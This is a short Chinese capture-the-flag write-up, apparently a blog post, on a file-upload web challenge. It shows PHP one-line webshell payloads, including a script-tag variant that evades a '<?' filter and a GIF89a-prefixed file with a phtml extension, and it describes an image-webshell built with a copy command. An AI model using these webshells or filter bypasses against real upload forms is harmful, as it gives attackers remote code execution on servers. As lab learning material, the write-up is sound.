BUUCTF WEB [极客大挑战 2019]Upload1

上传图片

第一时间想到上传木马

先试一下<?php eval($_REQUEST[8])?>写到txt中改后缀jpg上传

看来不行

试一下图片马

 copy yy.jpg/b + muamua.php mama.jpg

 

上传

还是不行

 换个思路

提示过滤了<?

去百度找找有没有其他的一句话木马

<script language="php">eval($_REQUEST[1])</script>

这个没有'<?'

 我靠成功了

但是链接菜刀失败了


看wp,大佬基本都是抓包改文件类型为图片和phtml后缀

php的内容是这个一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

确实成功了

但为神马我的图片马不行QAQ

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值